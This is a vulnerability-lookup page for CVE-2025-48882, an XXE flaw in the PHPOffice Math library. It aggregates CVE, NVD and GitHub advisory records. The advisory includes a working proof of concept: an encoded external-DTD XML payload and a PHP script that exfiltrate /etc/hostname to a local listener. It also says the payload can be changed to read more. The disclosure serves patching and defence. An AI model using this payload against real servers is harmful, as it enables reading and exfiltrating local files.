CVE-2025-48882 (GCVE-0-2025-48882)
Vulnerability from cvelistv5
Published
2025-05-30 19:43
Modified
2025-05-30 20:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-611 - Improper Restriction of XML External Entity Reference
Summary
PHPOffice Math is a library that provides a set of classes to manipulate different formula file formats. Prior to version 0.3.0, loading XML data using the standard `libxml` extension and the `LIBXML_DTDLOAD` flag without additional filtration, leads to XXE. Version 0.3.0 fixes the vulnerability.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-48882",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-30T20:46:07.358714Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-30T20:46:17.339Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Math",
"vendor": "PHPOffice",
"versions": [
{
"status": "affected",
"version": "\u003c 0.3.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PHPOffice Math is a library that provides a set of classes to manipulate different formula file formats. Prior to version 0.3.0, loading XML data using the standard `libxml` extension and the `LIBXML_DTDLOAD` flag without additional filtration, leads to XXE. Version 0.3.0 fixes the vulnerability."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-611",
"description": "CWE-611: Improper Restriction of XML External Entity Reference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-30T19:43:35.441Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
},
{
"name": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
}
],
"source": {
"advisory": "GHSA-42hm-pq2f-3r7m",
"discovery": "UNKNOWN"
},
"title": "PHPOffice Math allows XXE when processing an XML file in the MathML format"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-48882",
"datePublished": "2025-05-30T19:43:35.441Z",
"dateReserved": "2025-05-27T20:14:34.296Z",
"dateUpdated": "2025-05-30T20:46:17.339Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-48882\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-30T20:15:43.527\",\"lastModified\":\"2025-06-02T17:32:17.397\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PHPOffice Math is a library that provides a set of classes to manipulate different formula file formats. Prior to version 0.3.0, loading XML data using the standard `libxml` extension and the `LIBXML_DTDLOAD` flag without additional filtration, leads to XXE. Version 0.3.0 fixes the vulnerability.\"},{\"lang\":\"es\",\"value\":\"PHPOffice Math es una librer\u00eda que proporciona un conjunto de clases para manipular diferentes formatos de archivos de f\u00f3rmulas. Antes de la versi\u00f3n 0.3.0, cargar datos XML con la extensi\u00f3n est\u00e1ndar `libxml` y el indicador `LIBXML_DTDLOAD` sin filtrado adicional provocaba XXE. La versi\u00f3n 0.3.0 corrige esta vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-611\"}]}],\"references\":[{\"url\":\"https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-48882\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-05-30T20:46:07.358714Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-05-30T20:46:13.055Z\"}}], \"cna\": {\"title\": \"PHPOffice Math allows XXE when processing an XML file in the MathML format\", \"source\": {\"advisory\": \"GHSA-42hm-pq2f-3r7m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"PHPOffice\", \"product\": \"Math\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.3.0\"}]}], \"references\": [{\"url\": \"https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m\", \"name\": \"https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a\", \"name\": \"https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PHPOffice Math is a library that provides a set of classes to manipulate different formula file formats. Prior to version 0.3.0, loading XML data using the standard `libxml` extension and the `LIBXML_DTDLOAD` flag without additional filtration, leads to XXE. Version 0.3.0 fixes the vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-611\", \"description\": \"CWE-611: Improper Restriction of XML External Entity Reference\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-05-30T19:43:35.441Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-48882\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-05-30T20:46:17.339Z\", \"dateReserved\": \"2025-05-27T20:14:34.296Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-05-30T19:43:35.441Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
fkie_cve-2025-48882
Vulnerability from fkie_nvd
Published
2025-05-30 20:15
Modified
2025-06-02 17:32
Severity ?
Summary
PHPOffice Math is a library that provides a set of classes to manipulate different formula file formats. Prior to version 0.3.0, loading XML data using the standard `libxml` extension and the `LIBXML_DTDLOAD` flag without additional filtration, leads to XXE. Version 0.3.0 fixes the vulnerability.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PHPOffice Math is a library that provides a set of classes to manipulate different formula file formats. Prior to version 0.3.0, loading XML data using the standard `libxml` extension and the `LIBXML_DTDLOAD` flag without additional filtration, leads to XXE. Version 0.3.0 fixes the vulnerability."
},
{
"lang": "es",
"value": "PHPOffice Math es una librer\u00eda que proporciona un conjunto de clases para manipular diferentes formatos de archivos de f\u00f3rmulas. Antes de la versi\u00f3n 0.3.0, cargar datos XML con la extensi\u00f3n est\u00e1ndar `libxml` y el indicador `LIBXML_DTDLOAD` sin filtrado adicional provocaba XXE. La versi\u00f3n 0.3.0 corrige esta vulnerabilidad."
}
],
"id": "CVE-2025-48882",
"lastModified": "2025-06-02T17:32:17.397",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-05-30T20:15:43.527",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
ghsa-42hm-pq2f-3r7m
Vulnerability from github
Published
2025-05-29 17:27
Modified
2025-05-30 21:42
Severity ?
VLAI Severity ?
Summary
PHPOffice Math allows XXE when processing an XML file in the MathML format
Details
Product: Math
Version: 0.2.0
CWE-ID: CWE-611: Improper Restriction of XML External Entity Reference
CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Description: An attacker can create a special XML file, during which it processed, external entities are loaded, and it’s possible to read local server files.
Impact: Local server files reading
Vulnerable component: The loadXML function with the unsafe LIBXML_DTDLOAD flag, the MathML class
Exploitation conditions: The vulnerability applies only to reading a file in the MathML format.
Mitigation: If there is no option to refuse using the LIBXML_DTDLOAD flag, it’s recommended to filter external entities through the implementation of the custom external entity loader function.
Researcher: Aleksandr Zhurnakov (Positive Technologies)
Research
Zero-day vulnerability was discovered in the Math library in the detailed process of the XXE vulnerability research in PHP.
Loading XML data, using the standard libxml extension and the LIBXML_DTDLOAD flag without additional filtration, leads to XXE.
Below are steps to reproduce the vulnerability.
-
Preparation:
-
The payload was tested on the PHP versions >= 8.1.
- The composer manager is used to install the latest version of the Math library.
- PHP has to be configurated with Zlib support.
- The necessary requirements for the Math library must be installed.
-
The
netcatutility is used for demonstration exfiltration. -
Make
mathdirectory and then moving into it.mkdir math && cd math -
Install the latest actual version of the library (Figure 1). ``` composer require phpoffice/math ```` Figure 1. Installing the library
-
Create
poc.xmlfile (Listing 1):
Listing 1. Creating poc.xml
```
xml
<foo></foo>
``
5. Createmath.php` file (Listing 2):
Listing 2. Creating math.php
````
<?php
require_once "./vendor/autoload.php";
$reader = new \PhpOffice\Math\Reader\MathML();
$reader->read(
file_get_contents('poc.xml')
);
```
6. The payload (see the step 4) is set to exfiltrate the/etc/hostnamefile throughhttp://127.0.0.1:9999/, so the listening socket is launched at the9999` port (Figure 2)
Figure 2. Launching the listening socket
- Execute php-script via console:
php math.php
6 characters from the /etc/hostname file will be exfiltrated to the 9999 port in base64 format (Figure 3).
Figure 3. Characters exfiltration
Decode the received data from base64 removing the last M character (the payload feature) (Figure 4).
Figure 4. Data decoding
- By changing the payload, the remaining file can be received.
Credits
Aleksandr Zhurnakov (Positive Technologies)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.2.0"
},
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/math"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48882"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-29T17:27:39Z",
"nvd_published_at": "2025-05-30T20:15:43Z",
"severity": "HIGH"
},
"details": "**Product:** Math\n**Version:** 0.2.0\n**CWE-ID:** CWE-611: Improper Restriction of XML External Entity Reference\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**Description:** An attacker can create a special XML file, during which it processed, external entities are loaded, and it\u2019s possible to read local server files. \n**Impact:** Local server files reading\n**Vulnerable component:** The [`loadXML`](https://github.com/PHPOffice/Math/blob/c3ecbf35601e2a322bf2ddba48589d79ac827b92/src/Math/Reader/MathML.php#L38C9-L38C55) function with the unsafe [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, the [`MathML`](https://github.com/PHPOffice/Math/blob/master/src/Math/Reader/MathML.php) class\n**Exploitation conditions:** The vulnerability applies only to reading a file in the `MathML` format.\n**Mitigation:** If there is no option to refuse using the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, it\u2019s recommended to filter external entities through the implementation of the [`custom external entity loader function`](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php).\n**Researcher: Aleksandr Zhurnakov (Positive Technologies)**\n\n## Research\nZero-day vulnerability was discovered in the [Math](https://github.com/PHPOffice/Math) library in the detailed process of the XXE vulnerability research in PHP.\nLoading XML data, using the standard [`libxml`](https://www.php.net/manual/en/book.libxml.php) extension and the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag without additional filtration, leads to XXE.\n\nBelow are steps to reproduce the vulnerability.\n\n1. Preparation:\n\n- The payload was tested on the PHP versions \u003e= 8.1.\n- The [composer](https://getcomposer.org/) manager is used to install the latest version of the Math library.\n- PHP has to be configurated with [Zlib](https://www.php.net/manual/ru/book.zlib.php) support.\n- The necessary [requirements](https://github.com/PHPOffice/Math?tab=readme-ov-file#requirements) for the Math library must be installed.\n- The `netcat` utility is used for demonstration exfiltration.\n\n2. Make `math` directory and then moving into it.\n````\nmkdir math \u0026\u0026 cd math\n````\n\n3. Install the latest actual version of the library (Figure 1). \n```\ncomposer require phpoffice/math\n````\n_Figure 1. Installing the library_\n\u003cimg width=\"630\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87\" /\u003e\n\n4. Create `poc.xml` file (Listing 1): \n\n_Listing 1. Creating `poc.xml`_\n```\nxml \n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e \u003c!DOCTYPE x SYSTEM \n\"php://filter/convert.base64-\ndecode/zlib.inflate/resource=data:,7Ztdb9owFIbv%2bRVZJ9armNjOZ2k7QUaL%2bRYO2nqFUn\nBFNQaMptP272cnNFuTsBbSskg1iATZzvGxn/ccX3A4fdfoecS7UsrK1A98hV5Rr9FVjlaz1UmlcnM7D9i\n6MlkufrB1AK79O2bqKltMllMWt96KL6ADwci7sJ4Yu0vr9/tlwKbqan27CPzrOXvevFGrbRvOGIseaCa7\nTAxok1x44xahXzQEcdKPKZPevap3RZw920I0VscWGLlU1efPsy0c5cbV1AoI7ZuOMCZW12nkcP9Q2%2bQ\nObBNmL6ajg8s6xJqmJTrq5NIArX6zVk8Zcwwt4fPuLvHnbeBSvpdIQ6g93MvUv3CHqKNrmtEW4EYmCr5g\nDT5QzyNWE4x6xO1/aqQmgMhGYgaVDFUnScKltbFnaJoKHRuHK0L1pIkuaYselMe9cPUqRmm5C51u00kkh\ny1S3aBougkl7e4d6RGaTYeSehdCjAG/O/p%2bYfKyQsoLmgdlmsFYQFDjh6GWJyGE0ZfMX08EZtwNTdAY\nud7nLcksnwppA2UnqpCzgyDo1QadAU3vLOQZ82EHMxAi0KVcq7rzas5xD6AQoeqkYkgk02abukkJ/z%2b\nNvkj%2bjUy16Ba5d/S8anhBLwt44EgGkoFkIBlIBpKBZCAZSAaSgWQgGUgGkoFkIBlIBpKBZCAZSAaSgW\nQgGUgGxWOwW2nF7kt%2by7/Kb3ag2GUTUgBvXAAxiKxt4Is3sB4WniVrOvhwzB0CXerg5GN9esGRQv7Rg\nQdMmMO9sIwtc/sIJUOCsY4ee7f7FIWu2Si4euKan8wg58nFsEIXxYGntgZqMog3Z2FrgPhgyzIOlsmijo\nwqwb0jyMqMoGEbarqdOpP/iqFISMkSVFG1Z5p8f3OK%2bxAZ7gClpgUPg70rq0T2RIkcup/0newQ7NbcU\nXv/DPl4LL/N7hdfn2dp07pmd8v79YSdVVgwqcyWd8HC/8aOzkunf6r%2b2c8bpSxK/6uPmlf%2br/nSny\nrHcduH99iqKiz7HwLxTLMgEM0QWUDjb3ji8NdHPslZmV%2bqR%2bfH56Xyxni1VGbV0m8=\" \n[]\u003e\u003cfoo\u003e\u003c/foo\u003e\n```\n5. Create `math.php` file (Listing 2): \n\n*Listing 2. Creating `math.php`*\n````\n\u003c?php\n require_once \"./vendor/autoload.php\";\n\n $reader = new \\PhpOffice\\Math\\Reader\\MathML();\n $reader-\u003eread(\n file_get_contents(\u0027poc.xml\u0027)\n );\n````\n6. The payload (see the step 4) is set to exfiltrate the `/etc/hostname` file through `http://127.0.0.1:9999/`, so the listening socket is launched at the `9999` port (Figure 2)\n\n_Figure 2. Launching the listening socket_\n\u003cimg width=\"550\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/6da5b966-70be-4e3e-9bde-c6baf4dfef34\" /\u003e\n\n7. Execute php-script via console: \n````\nphp math.php \n````\n\n6 characters from the `/etc/hostname` file will be exfiltrated to the `9999` port in base64 format (Figure 3). \n\n_Figure 3. Characters exfiltration_\n\u003cimg width=\"520\" alt=\"fig3\" src=\"https://github.com/user-attachments/assets/f0eae873-d156-442f-ab08-12dd94a8dbe9\" /\u003e\n\nDecode the received data from base64 removing the last `M` character (the payload feature) (Figure 4).\n\n*Figure 4. Data decoding*\n\u003cimg width=\"595\" alt=\"fig4\" src=\"https://github.com/user-attachments/assets/7a091a07-7856-41a0-b1bd-3d8009303ced\" /\u003e\n\n8. By changing the payload, the remaining file can be received. \n\n## Credits\nAleksandr Zhurnakov (Positive Technologies)",
"id": "GHSA-42hm-pq2f-3r7m",
"modified": "2025-05-30T21:42:11Z",
"published": "2025-05-29T17:27:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48882"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/Math"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "PHPOffice Math allows XXE when processing an XML file in the MathML format "
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…